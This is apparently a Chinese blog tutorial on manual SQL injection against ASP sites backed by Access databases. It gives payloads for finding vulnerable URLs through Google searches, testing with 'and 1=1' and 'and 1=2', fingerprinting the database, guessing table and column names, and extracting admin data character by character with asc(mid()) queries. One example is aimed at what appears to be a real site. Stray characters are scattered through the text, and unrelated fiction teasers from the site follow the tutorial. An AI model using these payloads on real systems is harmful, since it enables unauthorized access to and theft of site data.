ACCESS手工注入

判斷是否存在注入

找到一個類似于http://www.xxx.com/xx.asp?id=xxxx的URL后(用Google Hack搜索)占卧,加 ‘ (單引號)清焕,報錯间涵,則該網(wǎng)站可能就存在注入漏洞了任内,然后分為 提交 http://www.xxx.com/xx.asp?id=xxxx and 1=1和http://www.xxx.com/xx.asp?id=xxxx and 1=2 如果它們兩返回的頁面不同就說明存在注入漏洞

判斷后臺數(shù)據(jù)庫的類型

http://www.xxx.com/xx.asp?id=xxxx and user>0

如果是ACCESS數(shù)據(jù)庫揍很,就會在返回的錯誤里面含有“Microsoft JEF Database”關(guān)鍵字

image.png

如果是MSSQL數(shù)據(jù)庫,就會在返回的錯誤提示里面含有“SQL Sever”關(guān)鍵字

image.png

猜解表名

http://www.xxx.com/xx.asp?id=xxxx and exists (select * from 表名)

http://www.xxx.com/xx.asp?id=xxxx and exists (select count from 表名)

若頁面返回正常辆雾,則說明存在這個表

猜解列名

http://www.xxx.com/xx.asp?id=xxxx and exists (select 列名 from 表名)

http://www.xxx.com/xx.asp?id=xxxx and exists (select count(列名) from 表名)

若頁面返回正常肪笋,則說明存在這個列

猜解列的長度

http://www.xxx.com/xx.asp?id=xxxx and (select top 1 len(列名) from 表名) > x

其中x是數(shù)字,我們需要變換這個x就是列的長度值度迂。

例:若提交

http://www.xxx.com/xx.asp?id=xxxx and (select top 1 len(adminname) from config)>1藤乙、>2、>3惭墓、>4都返回正常坛梁,
猜到>5時出現(xiàn)錯誤提示,說明列的長度為5

注:變換top后的數(shù)字就可以猜解這個列的第N行長度

http://www.xxx.com/xx.asp?id=xxxx and (select top N len(adminname) from config)>x

這就是猜解adminname列的第N行長度

猜解列的內(nèi)容

介紹兩個函數(shù):

  1. Mid函數(shù):Mid(列名,N,1)函數(shù)截取第N位字符

  2. ASC函數(shù):ASC(Mid(列名,N,1))函數(shù)得到第N位字符的ASCII碼

http://www.xxx.com/xx.asp?id=xxxx and (select top 1 asc(mid(列名,列數(shù)N,1)) from 表名) > x

注:1. top后的數(shù)字為該列的第N行腊凶,x為ASCII碼划咐,列數(shù)N就是在這一列中的第幾個數(shù)字

例:如果提交

http://www.cctv5.com.cn/TVPLAY.ASP?id=7 and (select top 1 asc(mid(adminname,1,1)) from config) >50,返回正常钧萍,
提交>100返回正常褐缠,提交>80返回正常,提交>96返回正常风瘦,提交>97返回錯誤队魏,所以adminname列的第一行記錄中的第一個字母的ASCII碼為97,也就是字母a
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末万搔,一起剝皮案震驚了整個濱河市胡桨,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌瞬雹,老刑警劉巖登失,帶你破解...
    沈念sama閱讀 221,548評論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異挖炬,居然都是意外死亡揽浙,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,497評論 3 399
  • 文/潘曉璐 我一進(jìn)店門意敛,熙熙樓的掌柜王于貴愁眉苦臉地迎上來馅巷,“玉大人,你說我怎么就攤上這事草姻〉鲡” “怎么了?”我有些...
    開封第一講書人閱讀 167,990評論 0 360
  • 文/不壞的土叔 我叫張陵撩独,是天一觀的道長敞曹。 經(jīng)常有香客問我账月,道長,這世上最難降的妖魔是什么澳迫? 我笑而不...
    開封第一講書人閱讀 59,618評論 1 296
  • 正文 為了忘掉前任局齿,我火速辦了婚禮,結(jié)果婚禮上橄登,老公的妹妹穿的比我還像新娘抓歼。我一直安慰自己,他們只是感情好拢锹,可當(dāng)我...
    茶點故事閱讀 68,618評論 6 397
  • 文/花漫 我一把揭開白布谣妻。 她就那樣靜靜地躺著,像睡著了一般卒稳。 火紅的嫁衣襯著肌膚如雪蹋半。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,246評論 1 308
  • 那天充坑,我揣著相機(jī)與錄音减江,去河邊找鬼。 笑死匪傍,一個胖子當(dāng)著我的面吹牛您市,可吹牛的內(nèi)容都是我干的觉痛。 我是一名探鬼主播役衡,決...
    沈念sama閱讀 40,819評論 3 421
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼薪棒!你這毒婦竟也來了手蝎?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,725評論 0 276
  • 序言:老撾萬榮一對情侶失蹤俐芯,失蹤者是張志新(化名)和其女友劉穎棵介,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體吧史,經(jīng)...
    沈念sama閱讀 46,268評論 1 320
  • 正文 獨居荒郊野嶺守林人離奇死亡邮辽,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,356評論 3 340
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了贸营。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片吨述。...
    茶點故事閱讀 40,488評論 1 352
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖钞脂,靈堂內(nèi)的尸體忽然破棺而出揣云,到底是詐尸還是另有隱情,我是刑警寧澤冰啃,帶...
    沈念sama閱讀 36,181評論 5 350
  • 正文 年R本政府宣布邓夕,位于F島的核電站刘莹,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏焚刚。R本人自食惡果不足惜点弯,卻給世界環(huán)境...
    茶點故事閱讀 41,862評論 3 333
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望汪榔。 院中可真熱鬧蒲拉,春花似錦、人聲如沸痴腌。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,331評論 0 24
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽士聪。三九已至锦援,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間剥悟,已是汗流浹背灵寺。 一陣腳步聲響...
    開封第一講書人閱讀 33,445評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留区岗,地道東北人略板。 一個月前我還...
    沈念sama閱讀 48,897評論 3 376
  • 正文 我出身青樓,卻偏偏與公主長得像慈缔,于是被迫代替她去往敵國和親叮称。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,500評論 2 359

推薦閱讀更多精彩內(nèi)容